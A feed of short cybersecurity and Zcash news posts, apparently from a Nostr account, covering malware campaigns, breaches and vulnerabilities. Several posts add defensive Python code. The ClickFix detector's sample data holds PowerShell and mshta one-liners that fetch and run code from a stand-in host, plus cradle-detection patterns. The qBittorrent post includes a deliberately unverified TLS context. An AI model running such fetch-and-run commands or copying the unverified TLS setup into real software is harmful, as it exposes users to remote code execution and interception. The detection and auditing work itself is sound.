Oddbean

Notes by zCat

 Zcash Zebra implementation walkthrough for developers from the Zcash Foundation

See more:
https://youtu.be/aV93Ux3j4Gw

#zcash #privacy 
 Germany drafts law to protect researchers who find security flaws

The Federal Ministry of Justice in Germany has drafted a law to provide legal protection to security researchers who discover and responsibly report security vulnerabilities to vendors.

When security research is conducted within the specified boundaries, those responsible will be excluded from criminal liability and the risk of prosecution.

"Those who want to close IT security gaps deserve recognition—not a letter from the prosecutor," stated Federal Minister of Justice Dr. Marco Buschmann.

See more: https://www.bleepingcomputer.com/news/security/germany-drafts-law-to-protect-researchers-who-find-security-flaws/

#cybersecurity 
 New SteelFox malware hijacks Windows PCs using vulnerable driver

A new malicious package called 'SteelFox' mines for cryptocurrency and steals credit card data by using the “bring your own vulnerable driver” technique to get SYSTEM privileges on Windows machines.

The malware bundle dropper is distributed through forums and torrent trackers as a crack tool that activates legitimate versions of various software like Foxit PDF Editor, JetBrains and AutoCAD.

Using a vulnerable driver for privilege escalation is common for state-sponsored threat actors and ransomware groups. However, the technique now appears to extend to info-stealing malware attacks.

See more: https://www.bleepingcomputer.com/news/security/new-steelfox-malware-hijacks-windows-pcs-using-vulnerable-driver/

#cybersecurity #malware 
 VEILDrive Attack Exploits Microsoft Services to Evade Detection and Distribute Malware

An ongoing threat campaign dubbed VEILDrive has been observed taking advantage of legitimate services from Microsoft, including Teams, SharePoint, Quick Assist, and OneDrive, as part of its modus operandi.

"Leveraging Microsoft SaaS services — including Teams, SharePoint, Quick Assist, and OneDrive — the attacker exploited the trusted infrastructures of previously compromised organizations to distribute spear-phishing attacks and store malware," Israeli cybersecurity company Hunters said in a new report.

"This cloud-centric strategy allowed the threat actor to avoid detection by conventional monitoring systems."

See more: https://thehackernews.com/2024/11/veildrive-attack-exploits-microsoft.html

#cybersecurity #malware 
 Winos4.0 Malware Found in Game Apps, Targets Windows Users

A new malicious software framework, “Winos4.0,” has been discovered embedded in game-related applications targeting Windows users.

According to researchers at FortiGuard Labs, this malware framework is a sophisticated variant derived from Gh0strat. Winos4.0 can execute multiple actions remotely and provides attackers with extensive control over affected systems.

The malware operates by distributing game-related applications, such as installation tools and performance boosters, to gain initial access to target devices.

See more: https://www.infosecurity-magazine.com/news/winos40-malware-found-game-windows/

#cybersecurity #malware 
 South Korea Fines Meta $15.67M for Illegally Sharing Sensitive User Data with Advertisers

Meta has been fined 21.62 billion won ($15.67 million) by South Korea's data privacy watchdog for illegally collecting sensitive personal information from Facebook users, including data about their political views and sexual orientation, and sharing it with advertisers without their consent.

The country's Personal Information Protection Commission (PIPC) said Meta gathered information such as religious affiliations, political views, and same-sex marital status of about 980,000 domestic Facebook users and shared it with 4,000 advertisers.

"Specifically, it was found that behavioral information, such as the pages that users 'liked' on Facebook and the ads they clicked on, was analyzed to create and operate advertising topics related to sensitive information," the PIPC said in a press statement.

See more: https://thehackernews.com/2024/11/south-korea-fines-meta-1567m-for.html

#privacy #meta 
 Google Cloud to make MFA mandatory by the end of 2025

Google has announced that multi-factor authentication (MFA) will be mandatory on all Cloud accounts by the end of 2025 to enhance security.

Google Cloud is a product designed for businesses, developers, and IT teams to build, deploy, and manage applications and infrastructure in the cloud.

The mandatory MFA rollout will affect both admins and any users with access to Google Cloud services but not general consumer Google accounts.

See more: https://www.bleepingcomputer.com/news/security/google-cloud-to-make-mfa-mandatory-by-the-end-of-2025/

#cybersecurity #google #mfa 
 ClickFix Exploits Users with Fake Errors and Malicious Code

A new social engineering tactic, known as ClickFix, has emerged, using deceptive error messages to prompt users to run harmful code.

The Sekoia Threat Detection & Research (TDR) team has recently detailed this tactic – first discovered by Proofpoint in March – in a new report published earlier today. This approach, called ClearFake, encourages users to copy and execute malicious PowerShell commands, enabling cybercriminals to infect users’ devices.

ClickFix exploits fake error messages across multiple platforms, such as Google Meet and Zoom, often mimicking error notifications on video conferencing pages to lure users.

See more: https://www.infosecurity-magazine.com/news/clickfix-fake-errors-malicious-code/

#cybersecurity #clickfix 
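ClickFix works because the victim pastes the attacker's one-liner into the Run box (or a terminal) themselves, so the process tree shows an interpreter launched directly by the shell with the traits of a download cradle. The detection below is an added example, not Sekoia's or Proofpoint's code: it scores constructed process-creation events supplied in a simplified `parent|image|cmdline` form (a real pipeline would map Sysmon Event 1 or Security 4688 fields onto those three values; the sample lines, hostnames and thresholds are all assumptions).

```python
import re
from dataclasses import dataclass
from typing import List


@dataclass
class ProcEvent:
    parent: str    # parent image name
    image: str     # spawned image name
    cmdline: str   # full command line


# Traits of a pasted one-liner rather than an admin's interactive session.
CRADLE_PATTERNS = [
    r"-w(?:indowstyle)?\s+hidden",                        # hide the console
    r"-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}",     # base64-encoded payload
    r"\b(?:iwr|invoke-webrequest|irm|invoke-restmethod|downloadstring|downloadfile)\b",
    r"\biex\b|invoke-expression",                         # run what was fetched
    r"\bmshta\b.*https?://",                              # remote HTA
    r"\bcurl\b.*\|\s*(?:cmd|powershell|bash)",
]
CRADLE = re.compile("|".join(CRADLE_PATTERNS), re.IGNORECASE)
INTERPRETERS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe"}
RUN_DIALOG_PARENTS = {"explorer.exe"}   # Win+R / Run box launches come from the shell


def parse_line(line: str) -> ProcEvent:
    """Constructed 'parent|image|cmdline' form (assumption: real telemetry is mapped to this)."""
    parent, image, cmdline = line.split("|", 2)
    return ProcEvent(parent.strip().lower(), image.strip().lower(), cmdline.strip())


def score(ev: ProcEvent) -> int:
    """2 points for an interpreter spawned straight from the shell, 1 per cradle trait."""
    s = 0
    if ev.image in INTERPRETERS and ev.parent in RUN_DIALOG_PARENTS:
        s += 2
    s += len(CRADLE.findall(ev.cmdline))
    return s


SAMPLE_EVENTS = [  # constructed, not real telemetry
    'explorer.exe|powershell.exe|powershell -w hidden -c "iwr https://example.invalid/fix.ps1 | iex"',
    'explorer.exe|powershell.exe|powershell -NoP -W Hidden -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA',
    'explorer.exe|mshta.exe|mshta https://example.invalid/verify.hta',
    'explorer.exe|powershell.exe|powershell.exe',
    'services.exe|powershell.exe|powershell.exe -ExecutionPolicy Bypass -File C:\\Scripts\\backup.ps1',
]


def flag_suspicious(lines: List[str] = SAMPLE_EVENTS, threshold: int = 3) -> List[str]:
    """Return the command lines whose score reaches the threshold."""
    return [ev.cmdline for ev in map(parse_line, lines) if score(ev) >= threshold]


if __name__ == "__main__":
    for cmd in flag_suspicious():
        print("ALERT:", cmd)
```

The threshold of 3 keeps an ordinary "open PowerShell from the Start menu" event (score 2) below the line while any shell-launched interpreter that also hides its window, decodes a blob, or pulls code from the network is flagged; a scheduled script run by `services.exe` scores 0.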
 Chinese Air Fryers May Be Spying on Consumers, Which? Warns

A consumer rights group has warned UK shoppers to research their next electronics purchases carefully, after finding evidence of “excessive smart device surveillance” from Chinese air fryers and other products.

Which? claimed that smart air fryers from Xiaomi, Cosori and Aigostar all wanted to know customers’ precise locations, as well as permission to record audio on the user’s phone.

The Xiaomi app linked to the smart device also connected to ad trackers from Facebook, TikTok’s Pangle ad network and Tencent, depending on the location of said user, the report claimed.

See more: https://www.infosecurity-magazine.com/news/chinese-air-fryers-spying/

#cybersecurity #privacy 
 Pakistani Hackers Targeted High-Profile Indian Entities using Custom RAT

A hacking group associated with the Pakistani government has repeatedly targeted high-profile entities in India with cyber espionage campaigns throughout 2024, according to cybersecurity provider Check Point.

Researchers at Check Point Research are closely tracking the persistent use of ElizaRAT, a custom implant deployed by Transparent Tribe, a cyber espionage group attributed to Pakistan, also known as APT36.

They observed several campaigns using the remote access trojan (RAT) in 2024, with many likely successful.

See more: https://www.infosecurity-magazine.com/news/pakistan-hackers-high-profile/

#cybersecurity 
 Interpol disrupts cybercrime activity on 22,000 IP addresses, arrests 41

Interpol has announced the arrest of 41 individuals and the takedown of 1,037 servers and infrastructure running on 22,000 IP addresses that facilitated cybercrime, in an international law enforcement action titled Operation Synergia II.

The operation took place between April and August 2024, spanning 95 countries and resulting in 41 arrests of those linked to various crimes, including ransomware, phishing, and information stealers.

Interpol said its enforcement action was backed by intelligence provided by private cybersecurity firms like Group-IB, Kaspersky, Trend Micro, and Team Cymru, leading to the identification of over 30,000 suspicious IP addresses.

See more: https://www.bleepingcomputer.com/news/security/interpol-disrupts-cybercrime-activity-on-22-000-ip-addresses-arrests-41/

#cybersecurity  
 Suspect behind Snowflake data-theft attacks arrested in Canada

Canadian authorities have arrested a man suspected of having stolen the data of hundreds of millions after targeting over 165 organizations, all of them customers of cloud storage company Snowflake.

According to Canada's Department of Justice, Alexander "Connor" Moucka (aka "Waifu" and "Judische") was taken into custody on Wednesday at the request of the United States and is scheduled to appear in court again today, as first reported by Bloomberg and confirmed by 404 Media.

"Following a request by the United States, Alexander Moucka (a.k.a. Connor Moucka) was arrested on a provisional arrest warrant on Wednesday October 30, 2024," Ian McLeod, a spokesperson for Canada's Department of Justice, told BleepingComputer on Tuesday.

See more: https://www.bleepingcomputer.com/news/security/suspect-behind-snowflake-data-theft-attacks-arrested-in-canada/

#cybersecurity #hacking 
 Researcher Discloses 36 Vulnerabilities Found in IBM Security Verify Access 

Security researcher Pierre Barre has drawn attention to three dozen vulnerabilities in IBM Security Verify Access (ISVA), including ones that could have allowed attackers to compromise the entire authentication infrastructure based on the authorization and network security policy management solution.

An attacker looking to exploit these issues would need to mount a man-in-the-middle (MiTM) attack or gain access to the internal network of an organization using IBM’s ISVA appliances and Docker images.

At least half of the security defects, including seven remote code execution flaws, one authentication bypass, eight privilege escalation bugs, and some other issues, could be exploited for full compromise.

See more: https://www.securityweek.com/researcher-discloses-32-vulnerabilities-found-in-ibm-security-verify-access/

#cybersecurity #ibm 
 Synology Urges Patch for Critical Zero-Click RCE Flaw Affecting Millions of NAS Devices

Taiwanese network-attached storage (NAS) appliance maker Synology has addressed a critical security flaw impacting DiskStation and BeePhotos that could lead to remote code execution.

Tracked as CVE-2024-10443 and dubbed RISK:STATION by Midnight Blue, the zero-day flaw was demonstrated at the Pwn2Own Ireland 2024 hacking contest by security researcher Rick de Jager.

RISK:STATION is an "unauthenticated zero-click vulnerability allowing attackers to obtain root-level code execution on the popular Synology DiskStation and BeeStation NAS devices, affecting millions of devices," the Dutch company said.

See more: https://thehackernews.com/2024/11/synology-urges-patch-for-critical-zero.html

#cybersecurity #zeroclick 
 OWASP Beefs Up GenAI Security Guidance Amid Growing Deepfakes

As businesses worry over deepfake scams and other AI attacks, organizations are adding guidance for cybersecurity teams on how to detect, and respond to, next-generation threats. That includes Exabeam, which was recently targeted by a deepfaked job candidate.

To help organizations develop stronger defenses against AI-based attacks, the Top 10 for LLM Applications & Generative AI group within the Open Worldwide Application Security Project (OWASP) released a trio of guidance documents for security organizations on Oct. 31. To its previously released AI cybersecurity and governance checklist, the group added a guide for preparing for deepfake events, a framework to create AI security centers of excellence, and a curated database on AI security solutions.

See more: https://www.darkreading.com/vulnerabilities-threats/owasp-genai-security-guidance-growing-deepfakes

#cybersecurity #ai #deepfake 
 Windows infected with backdoored Linux VMs in new phishing attacks

A new phishing campaign dubbed 'CRON#TRAP' infects Windows with a Linux virtual machine that contains a built-in backdoor to give stealthy access to corporate networks.

Using virtual machines to conduct attacks is nothing new, with ransomware gangs and cryptominers using them to stealthily perform malicious activity. However, threat actors commonly install these manually after they breach a network.

A new campaign spotted by Securonix researchers is instead using phishing emails to perform unattended installs of Linux virtual machines to breach and gain persistence on corporate networks.

The phishing emails pretend to be a "OneAmerica survey" that includes a large 285MB ZIP archive to install a Linux VM with a pre-installed backdoor.

See more: https://www.bleepingcomputer.com/news/security/windows-infected-with-backdoored-linux-vms-in-new-phishing-attacks/

#cybersecurity #windows 
 Google Warns of Actively Exploited CVE-2024-43093 Vulnerability in Android System

Google has warned that a security flaw impacting its Android operating system has come under active exploitation in the wild.

The vulnerability, tracked as CVE-2024-43093, has been described as a privilege escalation flaw in the Android Framework component that could result in unauthorized access to "Android/data," "Android/obb," and "Android/sandbox" directories and its sub-directories, according to a code commit message.

The tech giant has also flagged CVE-2024-43047, a now-patched security bug in Qualcomm chipsets, as having been actively exploited. It is a use-after-free vulnerability in the Digital Signal Processor (DSP) Service; successful exploitation could lead to memory corruption.

See more: https://thehackernews.com/2024/11/google-warns-of-actively-exploited-cve.html

#cybersecurity #android 
 Nokia investigates breach after hacker claims to steal source code

Nokia is investigating whether a third-party vendor was breached after a hacker claimed to be selling the company's stolen source code.

IntelBroker claimed to be selling Nokia source code that was stolen after they breached a third-party vendor's server.

IntelBroker states that the stolen data contains SSH keys, source code, RSA keys, BitBucket logins, SMTP accounts, webhooks, and hardcoded credentials.

The threat actor told BleepingComputer that they gained access to the third-party vendor's SonarQube server using default credentials, allowing them to download customers' Python projects, including those belonging to Nokia.

See more: https://www.bleepingcomputer.com/news/security/nokia-investigates-breach-after-hacker-claims-to-steal-source-code/

#cybersecurity #databreach 
 Zcashd 5.1.0 EOS halt tomorrow - upgrade your nodes if you run the Zcashd implementation!

See more:
https://github.com/zcash/zcash/releases/tag/v6.0.0

Original tweet:
https://x.com/zksquirrel/status/1853543902747279382

#zcash #zcashd 
 The Zcash Foundation has released Zebra version 2.0.1, with full support for NU6 on Mainnet. Please update your nodes.

Zebra now implements all suggestions from the audit provided by LeastAuthority. Another notable feature is the addition of cookie-based authentication for Zebra’s RPC server.

Finally, the end-of-support (EOS) halt goes back to occurring 16 weeks from the release date.

See more:
https://zfnd.org/zebra-2-0-1-release/

#Zcash #Zebra 
 Okta used to allow login bypass for any usernames with 52+ characters. 

This vulnerability was resolved in Okta's production environment on October 30, 2024

See more: 
https://trust.okta.com/security-advisories/okta-ad-ldap-delegated-authentication-username/

#cybersecurity 
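The linked advisory traces the bypass to how the AD/LDAP delegated-authentication cache key was built: a bcrypt hash over the concatenation of userId, username and password. bcrypt only uses the first 72 bytes of its input (most implementations truncate silently), so once userId plus username already fill 72 bytes the password no longer influences the key, and a cached key from an earlier successful login matches any password. The model below is an added example, not Okta's code: SHA-256 with an explicit 72-byte truncation stands in for bcrypt so it runs without a bcrypt library, and it assumes a 20-character userId, which is what puts the threshold at 52.

```python
import hashlib
from typing import Callable, Optional

BCRYPT_INPUT_LIMIT = 72  # bcrypt hashes at most the first 72 bytes of its input
USER_ID_LEN = 20         # assumption: Okta-style user ids ("00u...") are 20 characters


def weak_cache_key(user_id: str, username: str, password: str) -> str:
    """Model of the flawed scheme: one hash over userId + username + password,
    with bcrypt's input limit modelled as an explicit truncation.
    SHA-256 stands in for bcrypt here; only the truncation matters."""
    material = (user_id + username + password).encode()[:BCRYPT_INPUT_LIMIT]
    return hashlib.sha256(material).hexdigest()


def safe_cache_key(user_id: str, username: str, password: str) -> str:
    """Hardened form: length-prefix each field and pre-hash the tuple, so the
    value handed to the slow hash is a fixed 32 bytes; no field can push
    another past the limit and no field boundary is ambiguous."""
    def field(s: str) -> bytes:
        b = s.encode()
        return len(b).to_bytes(4, "big") + b
    digest = hashlib.sha256(field(user_id) + field(username) + field(password)).digest()
    return hashlib.sha256(digest[:BCRYPT_INPUT_LIMIT]).hexdigest()  # 32 bytes: nothing is cut


KeyFn = Callable[[str, str, str], str]


def password_ignored(key_fn: KeyFn, user_id: str, username: str) -> bool:
    """True if two different passwords map to the same cache key."""
    return key_fn(user_id, username, "correct horse battery staple") == \
           key_fn(user_id, username, "not-the-password")


def min_bypass_username_length(key_fn: KeyFn = weak_cache_key) -> Optional[int]:
    """Smallest username length at which the password stops mattering (None if never)."""
    user_id = "0" * USER_ID_LEN
    for n in range(1, 200):
        if password_ignored(key_fn, user_id, "a" * n):
            return n
    return None


def simulate_cached_login(key_fn: KeyFn, username: str) -> bool:
    """Constructed scenario: a genuine login populates the cache; later the
    directory is unreachable and only the cache is consulted. Returns True if
    a wrong password is accepted for the same username."""
    user_id = "00uabcdefghijklmnopq"  # constructed 20-character id
    cache = {key_fn(user_id, username, "correct horse battery staple")}
    return key_fn(user_id, username, "not-the-password") in cache


if __name__ == "__main__":
    print("weak scheme ignores the password from username length:", min_bypass_username_length())
    print("52-char username, wrong password, weak scheme:", simulate_cached_login(weak_cache_key, "a" * 52))
    print("52-char username, wrong password, safe scheme:", simulate_cached_login(safe_cache_key, "a" * 52))
```

The general lesson is broader than this one product: never feed a length-limited primitive a raw concatenation of attacker-controlled fields; pre-hash with unambiguous framing first.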
 Hackers Leak 300,000 MIT Technology Review Magazine User Records

Hackers claim to have breached MIT Technology Review Magazine via a third-party contractor, leaking nearly 300,000 user records on Breach Forums. Data includes full names, email addresses, and activity details, posing risks for phishing and targeted scams.

See more: https://hackread.com/hackers-leak-mit-technology-review-user-records/

#cybersecurity #privacy 
 City of Columbus: Data of 500,000 stolen in July ransomware attack

The City of Columbus, Ohio, notified 500,000 individuals that a ransomware gang stole their personal and financial information in a July 2024 cyberattack.

See more: https://www.bleepingcomputer.com/news/security/city-of-columbus-data-of-500-000-stolen-in-july-ransomware-attack/

#cybersecurity #ransomware 
 Supply Chain Attack Uses Smart Contracts for C2 Ops

Security researchers claim to have discovered the first-ever open source supply chain attack combining blockchain technology with traditional attack vectors.

“The attacker used a classic typosquatting technique by misspelling ‘fetch’ as ‘fet’ while maintaining the key terms ‘jest’ and ‘mock,’” it wrote.

“Given that the legitimate packages are primarily used in development environments where developers typically have elevated system privileges, and are often integrated into CI/CD pipelines, we believe this attack specifically targets development infrastructure through the compromise of testing environments.”

See more: https://www.infosecurity-magazine.com/news/supply-chain-attack-smart/

#cybersecurity #smartcontract #supplychainattack 
 Malware Campaign Uses Ethereum Smart Contracts to Control npm Typosquat Packages

An ongoing campaign is targeting npm developers with hundreds of typosquat versions of their legitimate counterparts in an attempt to trick them into running cross-platform malware.

The attack is notable for utilizing Ethereum smart contracts for command-and-control (C2) server address distribution, according to independent findings from Checkmarx, Phylum, and Socket published over the past few days.

The activity was first flagged on October 31, 2024, although it's said to have been underway at least a week prior. No less than 287 typosquat packages have been published to the npm package registry.

See more: https://thehackernews.com/2024/11/malware-campaign-uses-ethereum-smart.html

nostr:nevent1qqsq8w6hg6zau75efs45zj03v7us74xm4pawuu69ng0flrczffr9j2cpz4mhxue69uhhyetvv9ujumn0wd68ytnzvuhsygqkl5n0qqz57es4r34a0yj7mm6ptpss8tce63zlj0mx7h3ykdzz0gpsgqqqqqqsy4r3nr

#cybersecurity #c2 #smartcontracts 
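Both of the npm posts above come down to two things a developer machine can check before `npm install` runs anything: whether a dependency name is a near-miss of a well-known package (the "fet" for "fetch" trick), and whether the manifest declares install-time lifecycle scripts, which execute automatically and are where the C2 lookup would live. The audit below is an added example, not code from Checkmarx, Phylum or Socket; the allowlist of known package names and the sample package.json are constructed, and the edit-distance limits are a judgement call.

```python
import json
import re
from typing import Dict, List, Tuple

# Constructed allowlist; a real audit would use the lockfile plus a
# download-ranked list of registry names.
KNOWN_PACKAGES = ["jest", "jest-fetch-mock", "node-fetch", "lodash", "express",
                  "axios", "chalk", "react", "typescript"]

INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")
RISKY_SCRIPT = re.compile(r"node\s+-e|curl|wget|\beval\b|base64|powershell|\.sh\b", re.I)


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance (insert/delete/substitute), O(len(a)*len(b))."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def typosquat_candidates(name: str, known: List[str] = KNOWN_PACKAGES) -> List[str]:
    """Known names within a small edit distance of `name`; exact matches are fine."""
    name = name.lower()
    if name in known:
        return []
    limit = 1 if len(name) <= 5 else 2      # for short names one typo is already a lot
    return sorted(k for k in known if edit_distance(name, k) <= limit)


def audit_package_json(text: str) -> List[Tuple[str, str, str]]:
    """Findings as (kind, subject, detail) tuples."""
    pkg: Dict = json.loads(text)
    findings = []
    for section in ("dependencies", "devDependencies", "optionalDependencies"):
        for dep in pkg.get(section, {}):
            close = typosquat_candidates(dep)
            if close:
                findings.append(("typosquat?", dep, "close to " + ", ".join(close)))
    for hook in INSTALL_HOOKS:
        cmd = pkg.get("scripts", {}).get(hook)
        if cmd:   # every install hook runs automatically during `npm install`
            kind = "install-hook-risky" if RISKY_SCRIPT.search(cmd) else "install-hook"
            findings.append((kind, hook, cmd))
    return findings


SAMPLE_PACKAGE_JSON = """{
  "name": "billing-service",
  "scripts": {
    "test": "jest",
    "postinstall": "node -e \\"require('./scripts/setup.js')\\""
  },
  "dependencies": { "express": "^4.19.2", "lodahs": "4.17.21" },
  "devDependencies": { "jest-fet-mock": "^3.0.0", "jest": "^29.7.0" }
}"""  # constructed example manifest


if __name__ == "__main__":
    for kind, subject, detail in audit_package_json(SAMPLE_PACKAGE_JSON):
        print(f"{kind:20} {subject:15} {detail}")
```

Running `npm install --ignore-scripts` in CI and on developer machines removes the automatic execution path entirely; the audit above is for deciding whether a package deserves a closer look before that flag is ever lifted for it.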
 DocuSign's Envelopes API abused to send realistic fake invoices

Threat actors are abusing DocuSign's Envelopes API to create and mass-distribute fake invoices that appear genuine, impersonating well-known brands like Norton and PayPal.

Using a legitimate service, the attackers bypass email security protections as they come from an actual DocuSign domain, docusign.net.

The goal is to have their targets e-sign the documents, which they can then use to authorize payments independently from the company's billing departments.

"If users e-sign this document, the attacker can use the signed document to request payment from the organization outside of DocuSign or send the signed document through DocuSign to the finance department for payment," explains a Wallarm security researcher.

See more: https://www.bleepingcomputer.com/news/security/docusigns-envelopes-api-abused-to-send-realistic-fake-invoices/

#cybersecurity #docusign #phishing 
 Google’s AI Tool Big Sleep Finds Zero-Day Vulnerability in SQLite Database Engine

Google said it discovered a zero-day vulnerability in the SQLite open-source database engine using its large language model (LLM) assisted framework called Big Sleep (formerly Project Naptime).

The tech giant described the development as the "first real-world vulnerability" uncovered using the artificial intelligence (AI) agent, while the researchers were not able to find the same vulnerability using traditional fuzzing. 

"We believe this is the first public example of an AI agent finding a previously unknown exploitable memory-safety issue in widely used real-world software," the Big Sleep team said in a blog post shared with The Hacker News.

The vulnerability in question is a stack buffer underflow in SQLite, which occurs when a piece of software references a memory location prior to the beginning of the memory buffer, thereby resulting in a crash or arbitrary code execution.

The flaw was discovered in a development branch of the library, meaning it was flagged before it made it into an official release.

See more:
The Hacker News:
https://thehackernews.com/2024/11/googles-ai-tool-big-sleep-finds-zero.html

SecurityWeek:
https://www.securityweek.com/google-says-its-ai-found-sqlite-vulnerability-that-fuzzing-missed/

#cybersecurity #sqlite #ai 
 Meet Interlock — The new ransomware targeting FreeBSD servers

A relatively new ransomware operation named Interlock attacks organizations worldwide, taking the unusual approach of creating an encryptor to target FreeBSD servers.

Launched at the end of September 2024, Interlock has since claimed attacks on six organizations, publishing stolen data on their data leak site after a ransom was not paid. One of the victims is Wayne County, Michigan, which suffered a cyberattack at the beginning of October.

Not much is known about the ransomware operation, with some of the first information coming from incident responder Simo in early October, who found a new backdoor [VirusTotal] deployed in an Interlock ransomware incident.

See more: https://www.bleepingcomputer.com/news/security/meet-interlock-the-new-ransomware-targeting-freebsd-servers/

#cybersecurity #ransomware 
 In Other News: FBI’s Ransomware Disruptions, Recall Delayed Again, CrowdStrike Responds to Bloomberg Article

SecurityWeek sums up last week's news in a brief overview. Check whether you have missed anything important 👀

See more: https://www.securityweek.com/in-other-news-fbis-ransomware-disruptions-recall-delayed-again-crowdstrike-responds-to-bloomberg-article/

#cybersecurity 
 GreyNoise Credits AI for Spotting Exploit Attempts on IoT Livestream Cams

Cybersecurity firm GreyNoise Intelligence is crediting an AI-powered tool for capturing attempts to exploit critical vulnerabilities in live streaming IoT cameras widely deployed at healthcare, industrial operations and government facilities. 

GreyNoise said it detected two distinct vulnerabilities — CVE-2024-8956 and CVE-2024-8957 — after an exploit attempt on its Sift automated threat-hunting honeypot system. An internal AI technology flagged the unusual activity, which allowed GreyNoise researchers to discover the zero-day vulnerabilities.

The most severe of the two vulnerabilities (CVE-2024-8956) carries a CVSS score of 9.1 out of 10 and allows an attacker to access sensitive information like usernames, MD5 password hashes, and configuration data. 

See more: https://www.securityweek.com/greynoise-credits-ai-for-spotting-exploit-attempts-on-iot-livestream-cams/

#cybersecurity #ai 
 Critical Auth Bugs Expose Smart Factory Gear to Cyberattack

Critical security vulnerabilities affecting factory automation software from Mitsubishi Electric and Rockwell Automation could variously allow remote code execution (RCE), authentication bypass, product tampering, or denial-of-service (DoS).

That's according to the US Cybersecurity and Infrastructure Security Agency (CISA), which warned yesterday that an attacker could exploit the Mitsubishi Electric bug (CVE-2023-6943, CVSS score of 9.8) by calling a function with a path to a malicious library while connected to the device — resulting in authentication bypass, RCE, DoS, or data manipulation.

The Rockwell Automation bug (CVE-2024-10386, CVSS 9.8), meanwhile, stems from a missing authentication check; a cyberattacker with network access could exploit it by sending crafted messages to a device, potentially resulting in database manipulation.

See more: https://www.darkreading.com/vulnerabilities-threats/critical-auth-bugs-smart-factory-cyberattack

#cybersecurity 
 LastPass warns of fake support centers trying to steal customer data

LastPass is warning about an ongoing campaign where scammers are writing reviews for its Chrome extension to promote a fake customer support phone number. However, this phone number is part of a much larger campaign to trick callers into giving scammers remote access to their computers, as discovered by BleepingComputer.

LastPass is a popular password manager that utilizes a LastPass Chrome extension to generate, save, manage, and autofill website passwords.

Threat actors are attempting to target a large swath of the company's user base by leaving 5-star reviews with a fake LastPass customer support number.

See more: https://www.bleepingcomputer.com/news/security/lastpass-warns-of-fake-support-centers-trying-to-steal-customer-data/

#cybersecurity #lastpass 
 Zero-Click Flaw Exposes Potentially Millions of Popular Storage Devices to Attack

A vulnerability categorized as “critical” in a photo app installed by default on Synology network-attached storage devices could give attackers the ability to steal data and worse.

A popular device and application used by millions of individuals and businesses around the world to store documents is vulnerable to a zero-click flaw, a group of Dutch researchers have discovered.

The vulnerability, which is called zero-click because it doesn’t require a user to click on anything to be infected, affects a photo application installed by default on popular network-attached storage (NAS) devices made by the Taiwanese firm Synology. The bug would allow attackers to gain access to the devices to steal personal and corporate files, plant a backdoor, or infect the systems with ransomware to prevent users from accessing their data.

See more: https://www.wired.com/story/synology-zero-click-vulnerability/

#cybersecurity #zeroclick 
 Zcash explores proposal of transition into hybrid Proof-of-work/Proof-of-stake system called Crosslink

See more:
https://github.com/ShieldedLabs/crosslink-deployment/blob/main/Scoping.md

YouTube:
https://www.youtube.com/live/O4wQi_i7k0I

#zcash #zec #privacy 
 qBittorrent fixes flaw exposing users to MitM attacks for 14 years

qBittorrent has addressed a remote code execution flaw caused by the failure to validate SSL/TLS certificates in the application's DownloadManager, a component that manages downloads throughout the app.

The flaw, introduced in a commit on April 6, 2010, was eventually fixed in the latest release, version 5.0.1, on October 28, 2024, more than 14 years later.

However, as security researcher Sharp Security highlighted in a blog post, the team fixed a notable flaw without adequately informing the users about it and without assigning a CVE to the problem.

See more: https://www.bleepingcomputer.com/news/security/qbittorrent-fixes-flaw-exposing-users-to-mitm-attacks-for-14-years/

#cybersecurity #torrent 
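The qBittorrent bug is the generic "encrypt but never verify" mistake: a TLS connection whose peer certificate is not checked protects against nobody who can sit on the path. The snippet below is an added example in Python (qBittorrent itself is C++/Qt, and this is not its code): it shows the weak client configuration beside the hardened one and an audit function that grades an `ssl.SSLContext` the way a code reviewer would, so the same check can be dropped into a test suite for any Python client in your own codebase.

```python
import ssl
from typing import List, Optional


def insecure_context() -> ssl.SSLContext:
    """The bug class described above: the channel is encrypted, but the peer is
    never verified, so any on-path attacker presenting a self-signed
    certificate is accepted and can read or rewrite every download."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    ctx.check_hostname = False          # must be cleared before verify_mode can be relaxed
    ctx.verify_mode = ssl.CERT_NONE
    return ctx


def hardened_context(cafile: Optional[str] = None) -> ssl.SSLContext:
    """Verify the chain against the system CA bundle (or a pinned `cafile`),
    check the hostname, and refuse anything older than TLS 1.2."""
    ctx = ssl.create_default_context(cafile=cafile)   # CERT_REQUIRED + check_hostname
    ctx.minimum_version = ssl.TLSVersion.TLSv1_2
    return ctx


def audit_context(ctx: ssl.SSLContext) -> List[str]:
    """Settings an auditor would flag; an empty list means the context is sane."""
    problems = []
    if ctx.verify_mode != ssl.CERT_REQUIRED:
        problems.append("peer certificate not required")
    if not ctx.check_hostname:
        problems.append("hostname not checked")
    if ctx.minimum_version < ssl.TLSVersion.TLSv1_2:
        problems.append("TLS < 1.2 allowed")
    return problems


if __name__ == "__main__":
    print("insecure:", audit_context(insecure_context()) or "ok")
    print("hardened:", audit_context(hardened_context()) or "ok")
```

To use the hardened context for real traffic, pass it as `context=` to `urllib.request.urlopen` or wrap a socket with `ctx.wrap_socket(sock, server_hostname=host)`; omitting `server_hostname` defeats the hostname check even when the context is otherwise correct.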
 A couple of Windows-related news items. Bugs, patches and a money-milking grift. Microsoft being Microsoft 🤷‍♂️

1) Windows 11 Task Manager bug shows wrong number of running processes
See more: https://www.bleepingcomputer.com/news/microsoft/windows-11-task-manager-bug-shows-wrong-number-of-running-processes/

2) Microsoft fixes Windows 10 bug causing apps to stop working
See more: https://www.bleepingcomputer.com/news/microsoft/microsoft-fixes-windows-10-bug-causing-apps-to-stop-working/

3) Microsoft wants $30 if you want to delay Windows 11 switch 
See more: https://www.bleepingcomputer.com/news/microsoft/microsoft-wants-30-if-you-want-to-delay-windows-11-switch/

#windows 
 Hackers target critical zero-day vulnerability in PTZ cameras 

See more: https://www.bleepingcomputer.com/news/security/hackers-target-critical-zero-day-vulnerability-in-ptz-cameras/

#cybersecurity #privacy 
 Sophos reveals 5-year battle with Chinese hackers attacking network devices

